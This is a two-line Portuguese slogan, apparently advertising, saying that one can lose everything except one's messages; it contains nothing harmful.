Jocê pode perder tudo. 
Menos suas mensagens. 
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